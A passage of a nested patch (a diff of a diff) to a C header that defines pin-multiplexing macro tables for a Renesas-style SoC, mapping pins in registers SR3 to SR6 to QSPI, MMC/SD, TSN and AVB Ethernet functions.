+-#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR4 */
++/* IP0SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR4_3_0	FM(TSN0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_7_4	FM(TSN0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_11_8	FM(TSN0_AVTP_PPS1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_15_12	FM(TSN0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_19_16	FM(TSN0_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_23_20	FM(TSN0_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_27_24	FM(TSN0_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_31_28	FM(TSN0_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR4_3_0	FM(TSN0_AVTP_PPS0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_7_4	FM(TSN0_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_11_8	FM(TSN0_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_15_12	FM(TSN0_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_19_16	FM(TSN0_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_23_20	FM(TSN0_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_27_24	FM(TSN0_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_31_28	FM(TSN0_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR4_3_0	FM(TSN0_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_7_4	FM(TSN0_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_11_8	FM(TSN0_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_15_12	FM(TSN0_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_19_16	FM(TSN0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_23_20	FM(PCIE0_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_27_24	FM(PCIE1_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_31_28	FM(AVS0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR4_3_0	FM(AVS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR5 */
++/* IP0SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR5_3_0	FM(AVB2_AVTP_PPS)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_7_4	FM(AVB2_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_11_8	FM(AVB2_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_15_12	FM(AVB2_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_19_16	FM(AVB2_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_23_20	FM(AVB2_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_27_24	FM(AVB2_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_31_28	FM(AVB2_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR5_3_0	FM(AVB2_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_7_4	FM(AVB2_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_11_8	FM(AVB2_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_15_12	FM(AVB2_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_19_16	FM(AVB2_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_23_20	FM(AVB2_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_27_24	FM(AVB2_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_31_28	FM(AVB2_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR5_3_0	FM(AVB2_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_7_4	FM(AVB2_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_11_8	FM(AVB2_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_15_12	FM(AVB2_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_19_16	FM(AVB2_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR6 */
+-/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
